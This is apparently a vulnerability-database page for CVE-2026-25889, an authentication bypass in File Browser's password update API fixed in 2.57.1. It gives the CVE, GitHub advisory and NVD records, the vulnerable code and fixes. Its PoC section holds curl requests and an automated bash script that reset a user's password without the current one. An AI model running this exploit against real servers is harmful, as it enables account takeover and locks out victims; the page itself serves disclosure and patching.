CVE-2026-25889 (GCVE-0-2026-25889)

Vulnerability from cvelistv5 – Published: 2026-02-09 21:18 – Updated: 2026-02-10 15:57

Title

File Browser has an Authentication Bypass in User Password Update

Summary

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, a case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user's password) without providing the current password. By using Title Case field name "Password" instead of lowercase "password" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means. This vulnerability is fixed in 2.57.1.

Severity ?

5.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-178 - Improper Handling of Case Sensitivity

Assigner

GitHub_M

References

URL

Tags

	https://github.com/filebrowser/filebrowser/securi…	x_refsource_CONFIRM
	https://github.com/filebrowser/filebrowser/commit…	x_refsource_MISC
	https://github.com/filebrowser/filebrowser/releas…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	filebrowser	filebrowser	Affected: < 2.57.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25889",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-10T15:30:08.411077Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-10T15:57:57.441Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "filebrowser",
          "vendor": "filebrowser",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.57.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, a case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user\u0027s password) without providing the current password. By using Title Case field name \"Password\" instead of lowercase \"password\" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means. This vulnerability is fixed in 2.57.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-178",
              "description": "CWE-178: Improper Handling of Case Sensitivity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-09T21:18:13.054Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r"
        },
        {
          "name": "https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4"
        },
        {
          "name": "https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1"
        }
      ],
      "source": {
        "advisory": "GHSA-hxw8-4h9j-hq2r",
        "discovery": "UNKNOWN"
      },
      "title": "File Browser has an Authentication Bypass in User Password Update"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25889",
    "datePublished": "2026-02-09T21:18:13.054Z",
    "dateReserved": "2026-02-06T21:08:39.130Z",
    "dateUpdated": "2026-02-10T15:57:57.441Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25889\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-09T22:16:03.723\",\"lastModified\":\"2026-02-10T15:22:54.740\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, a case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user\u0027s password) without providing the current password. By using Title Case field name \\\"Password\\\" instead of lowercase \\\"password\\\" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means. This vulnerability is fixed in 2.57.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-178\"}]}],\"references\":[{\"url\":\"https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25889\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-10T15:30:08.411077Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-10T15:30:09.148Z\"}}], \"cna\": {\"title\": \"File Browser has an Authentication Bypass in User Password Update\", \"source\": {\"advisory\": \"GHSA-hxw8-4h9j-hq2r\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"filebrowser\", \"product\": \"filebrowser\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.57.1\"}]}], \"references\": [{\"url\": \"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r\", \"name\": \"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4\", \"name\": \"https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1\", \"name\": \"https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, a case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user\u0027s password) without providing the current password. By using Title Case field name \\\"Password\\\" instead of lowercase \\\"password\\\" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means. This vulnerability is fixed in 2.57.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-178\", \"description\": \"CWE-178: Improper Handling of Case Sensitivity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-09T21:18:13.054Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25889\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-10T15:57:57.441Z\", \"dateReserved\": \"2026-02-06T21:08:39.130Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-09T21:18:13.054Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-HXW8-4H9J-HQ2R

Vulnerability from github – Published: 2026-02-10 00:22 – Updated: 2026-02-10 02:56

Summary

File Browser has an Authentication Bypass in User Password Update

Details

Security Advisory: Authentication Bypass in User Password Update

Summary

A case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user's password) without providing the current password. By using Title Case field name "Password" instead of lowercase "password" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means.

CVSS Score: 7.5 (High)
CWE: CWE-178 (Improper Handling of Case Sensitivity)

Details

The vulnerability exists in http/users.go in the userPutHandler function (lines 181-200).

Vulnerable Code

// http/users.go:181-200
if d.settings.AuthMethod == auth.MethodJSONAuth {
    var sensibleFields = map[string]struct{}{
        "all":          {},
        "username":     {},
        "password":     {},  // lowercase
        "scope":        {},
        "lockPassword": {},
        "commands":     {},
        "perm":         {},
    }

    for _, field := range req.Which {
        if _, ok := sensibleFields[field]; ok {  // Case-sensitive lookup
            if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
                return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
            }
            break
        }
    }
}

Root Cause

The sensibleFields map uses lowercase keys (e.g., "password")
The lookup sensibleFields[field] is case-sensitive
When req.Which contains "Password" (Title Case), the lookup returns false
The password verification block is skipped entirely
Later in the code (line 229), field names are converted to Title Case for processing, so "Password" is a valid field name

Attack Flow

1. Attacker obtains victim's JWT token (via XSS, log leakage, etc.)
2. Attacker sends PUT /api/users/{id} with:
   - which: ["Password"]  (Title Case - bypasses validation)
   - data.password: "attacker_password"
   - NO current_password field required
3. Password is changed without verification
4. Victim is locked out, attacker has full access

PoC

Prerequisites

A valid JWT token for any user account
Target Filebrowser instance using JSON authentication (default)

Reproduction Steps

Step 1: Obtain a valid JWT token

TOKEN=$(curl -s -X POST "http://target:8080/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"victim","password":"victim_password"}')

Step 2: Attempt normal password change (should fail)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["password"],
    "data": {"id": 1, "password": "NewPassword123456"}
  }'
# Response: 400 Bad Request (the current password is incorrect)

Step 3: Bypass with Title Case (succeeds without current_password)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["Password"],
    "data": {"id": 1, "password": "HackedPassword123"}
  }'
# Response: 200 OK

Step 4: Verify account takeover

# Original password no longer works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"victim_password"}'
# Response: 403 Forbidden

# New password works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"HackedPassword123"}'
# Response: Valid JWT token

Automated PoC Script

#!/bin/bash
# Usage: ./poc.sh <target> <username> <current_password> <new_password>

TARGET="$1"
USERNAME="$2"
CURRENT_PASS="$3"
NEW_PASS="$4"

# Login
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"$USERNAME\",\"password\":\"$CURRENT_PASS\"}")

# Get user ID from token
USER_ID=$(echo "$TOKEN" | python3 -c "
import sys,json,base64
parts=input().split('.')
payload=json.loads(base64.b64decode(parts[1]+'=='))
print(payload['user']['id'])
")

# Exploit: Change password without current_password
curl -s -X PUT "$TARGET/api/users/$USER_ID" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{
    \"what\": \"user\",
    \"which\": [\"Password\"],
    \"data\": {\"id\": $USER_ID, \"password\": \"$NEW_PASS\"}
  }"

echo "Password changed to: $NEW_PASS"

Impact

Who is Impacted

All Filebrowser users using JSON authentication method (default configuration)
Any user whose JWT token can be obtained by an attacker
Particularly high-value targets: administrator accounts

Attack Scenarios

Scenario	Impact
XSS + Token Theft	Complete account takeover
JWT in Server Logs	Mass account compromise
Shared Computer	Session hijacking
Malicious Browser Extension	Credential theft

Security Impact

Category	Severity
Confidentiality	High - Attacker gains full account access
Integrity	High - Attacker can modify all user data
Availability	High - Legitimate user locked out

Scope

The vulnerability affects password modification only
Other sensitive fields (Username, Scope, Perm, etc.) have additional protection via NonModifiableFieldsForNonAdmin check
However, for administrators, all fields can be modified using this bypass technique

Suggested Fix

Option 1: Case-insensitive field matching (Recommended)

// Convert field to lowercase before checking
for _, field := range req.Which {
    if _, ok := sensibleFields[strings.ToLower(field)]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

Option 2: Use Title Case in sensibleFields

var sensibleFields = map[string]struct{}{
    "All":          {},
    "Username":     {},
    "Password":     {},  // Title Case to match post-transformation
    "Scope":        {},
    "LockPassword": {},
    "Commands":     {},
    "Perm":         {},
}

// Check AFTER field name transformation
for k, v := range req.Which {
    v = cases.Title(language.English, cases.NoLower).String(v)
    req.Which[k] = v

    // Now check with Title Case
    if _, ok := sensibleFields[v]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

References

Affected File: http/users.go
Affected Lines: 181-200
Related Code: NonModifiableFieldsForNonAdmin (line 17)

Severity ?

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.57.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.57.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-178"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-10T00:22:33Z",
    "nvd_published_at": "2026-02-09T22:16:03Z",
    "severity": "MODERATE"
  },
  "details": "# Security Advisory: Authentication Bypass in User Password Update\n\n## Summary\n\nA case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user\u0027s password) **without providing the current password**. By using Title Case field name `\"Password\"` instead of lowercase `\"password\"` in the API request, the `current_password` verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means.\n\n**CVSS Score**: 7.5 (High)  \n**CWE**: CWE-178 (Improper Handling of Case Sensitivity)\n\n---\n\n## Details\n\nThe vulnerability exists in `http/users.go` in the `userPutHandler` function (lines 181-200).\n\n### Vulnerable Code\n\n```go\n// http/users.go:181-200\nif d.settings.AuthMethod == auth.MethodJSONAuth {\n    var sensibleFields = map[string]struct{}{\n        \"all\":          {},\n        \"username\":     {},\n        \"password\":     {},  // lowercase\n        \"scope\":        {},\n        \"lockPassword\": {},\n        \"commands\":     {},\n        \"perm\":         {},\n    }\n\n    for _, field := range req.Which {\n        if _, ok := sensibleFields[field]; ok {  // Case-sensitive lookup\n            if !users.CheckPwd(req.CurrentPassword, d.user.Password) {\n                return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect\n            }\n            break\n        }\n    }\n}\n```\n\n### Root Cause\n\n1. The `sensibleFields` map uses **lowercase** keys (e.g., `\"password\"`)\n2. The lookup `sensibleFields[field]` is **case-sensitive**\n3. When `req.Which` contains `\"Password\"` (Title Case), the lookup returns `false`\n4. The password verification block is skipped entirely\n5. Later in the code (line 229), field names are converted to Title Case for processing, so `\"Password\"` is a valid field name\n\n### Attack Flow\n\n```\n1. Attacker obtains victim\u0027s JWT token (via XSS, log leakage, etc.)\n2. Attacker sends PUT /api/users/{id} with:\n   - which: [\"Password\"]  (Title Case - bypasses validation)\n   - data.password: \"attacker_password\"\n   - NO current_password field required\n3. Password is changed without verification\n4. Victim is locked out, attacker has full access\n```\n\n---\n\n## PoC\n\n### Prerequisites\n- A valid JWT token for any user account\n- Target Filebrowser instance using JSON authentication (default)\n\n### Reproduction Steps\n\n**Step 1: Obtain a valid JWT token**\n```bash\nTOKEN=$(curl -s -X POST \"http://target:8080/api/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"username\":\"victim\",\"password\":\"victim_password\"}\u0027)\n```\n\n**Step 2: Attempt normal password change (should fail)**\n```bash\ncurl -s -X PUT \"http://target:8080/api/users/1\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"what\": \"user\",\n    \"which\": [\"password\"],\n    \"data\": {\"id\": 1, \"password\": \"NewPassword123456\"}\n  }\u0027\n# Response: 400 Bad Request (the current password is incorrect)\n```\n\n**Step 3: Bypass with Title Case (succeeds without current_password)**\n```bash\ncurl -s -X PUT \"http://target:8080/api/users/1\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"what\": \"user\",\n    \"which\": [\"Password\"],\n    \"data\": {\"id\": 1, \"password\": \"HackedPassword123\"}\n  }\u0027\n# Response: 200 OK\n```\n\n**Step 4: Verify account takeover**\n```bash\n# Original password no longer works\ncurl -s -X POST \"http://target:8080/api/login\" \\\n  -d \u0027{\"username\":\"victim\",\"password\":\"victim_password\"}\u0027\n# Response: 403 Forbidden\n\n# New password works\ncurl -s -X POST \"http://target:8080/api/login\" \\\n  -d \u0027{\"username\":\"victim\",\"password\":\"HackedPassword123\"}\u0027\n# Response: Valid JWT token\n```\n\n### Automated PoC Script\n\n```bash\n#!/bin/bash\n# Usage: ./poc.sh \u003ctarget\u003e \u003cusername\u003e \u003ccurrent_password\u003e \u003cnew_password\u003e\n\nTARGET=\"$1\"\nUSERNAME=\"$2\"\nCURRENT_PASS=\"$3\"\nNEW_PASS=\"$4\"\n\n# Login\nTOKEN=$(curl -s -X POST \"$TARGET/api/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"username\\\":\\\"$USERNAME\\\",\\\"password\\\":\\\"$CURRENT_PASS\\\"}\")\n\n# Get user ID from token\nUSER_ID=$(echo \"$TOKEN\" | python3 -c \"\nimport sys,json,base64\nparts=input().split(\u0027.\u0027)\npayload=json.loads(base64.b64decode(parts[1]+\u0027==\u0027))\nprint(payload[\u0027user\u0027][\u0027id\u0027])\n\")\n\n# Exploit: Change password without current_password\ncurl -s -X PUT \"$TARGET/api/users/$USER_ID\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\n    \\\"what\\\": \\\"user\\\",\n    \\\"which\\\": [\\\"Password\\\"],\n    \\\"data\\\": {\\\"id\\\": $USER_ID, \\\"password\\\": \\\"$NEW_PASS\\\"}\n  }\"\n\necho \"Password changed to: $NEW_PASS\"\n```\n\n---\n\n## Impact\n\n### Who is Impacted\n\n- **All Filebrowser users** using JSON authentication method (default configuration)\n- Any user whose JWT token can be obtained by an attacker\n- Particularly high-value targets: administrator accounts\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| XSS + Token Theft | Complete account takeover |\n| JWT in Server Logs | Mass account compromise |\n| Shared Computer | Session hijacking |\n| Malicious Browser Extension | Credential theft |\n\n### Security Impact\n\n| Category | Severity |\n|----------|----------|\n| Confidentiality | **High** - Attacker gains full account access |\n| Integrity | **High** - Attacker can modify all user data |\n| Availability | **High** - Legitimate user locked out |\n\n### Scope\n\n- The vulnerability affects **password modification only**\n- Other sensitive fields (`Username`, `Scope`, `Perm`, etc.) have additional protection via `NonModifiableFieldsForNonAdmin` check\n- However, for **administrators**, all fields can be modified using this bypass technique\n\n---\n\n## Suggested Fix\n\n### Option 1: Case-insensitive field matching (Recommended)\n\n```go\n// Convert field to lowercase before checking\nfor _, field := range req.Which {\n    if _, ok := sensibleFields[strings.ToLower(field)]; ok {\n        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {\n            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect\n        }\n        break\n    }\n}\n```\n\n### Option 2: Use Title Case in sensibleFields\n\n```go\nvar sensibleFields = map[string]struct{}{\n    \"All\":          {},\n    \"Username\":     {},\n    \"Password\":     {},  // Title Case to match post-transformation\n    \"Scope\":        {},\n    \"LockPassword\": {},\n    \"Commands\":     {},\n    \"Perm\":         {},\n}\n\n// Check AFTER field name transformation\nfor k, v := range req.Which {\n    v = cases.Title(language.English, cases.NoLower).String(v)\n    req.Which[k] = v\n    \n    // Now check with Title Case\n    if _, ok := sensibleFields[v]; ok {\n        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {\n            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect\n        }\n        break\n    }\n}\n```\n\n---\n\n## References\n\n- Affected File: `http/users.go`\n- Affected Lines: 181-200\n- Related Code: `NonModifiableFieldsForNonAdmin` (line 17)",
  "id": "GHSA-hxw8-4h9j-hq2r",
  "modified": "2026-02-10T02:56:29Z",
  "published": "2026-02-10T00:22:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25889"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "File Browser has an Authentication Bypass in User Password Update"
}

FKIE_CVE-2026-25889

Vulnerability from fkie_nvd - Published: 2026-02-09 22:16 - Updated: 2026-02-10 15:22

Severity ?

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4
	security-advisories@github.com	https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1
	security-advisories@github.com	https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to 2.57.1, a case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user\u0027s password) without providing the current password. By using Title Case field name \"Password\" instead of lowercase \"password\" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means. This vulnerability is fixed in 2.57.1."
    }
  ],
  "id": "CVE-2026-25889",
  "lastModified": "2026-02-10T15:22:54.740",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-09T22:16:03.723",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-178"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25889 (GCVE-0-2026-25889)

GHSA-HXW8-4H9J-HQ2R

Security Advisory: Authentication Bypass in User Password Update

Summary

Details

Vulnerable Code

Root Cause

Attack Flow

PoC

Prerequisites

Reproduction Steps

Automated PoC Script

Impact

Who is Impacted

Attack Scenarios

Security Impact

Scope

Suggested Fix

Option 1: Case-insensitive field matching (Recommended)

Option 2: Use Title Case in sensibleFields

References

FKIE_CVE-2026-25889

Tags

Sightings

Nomenclature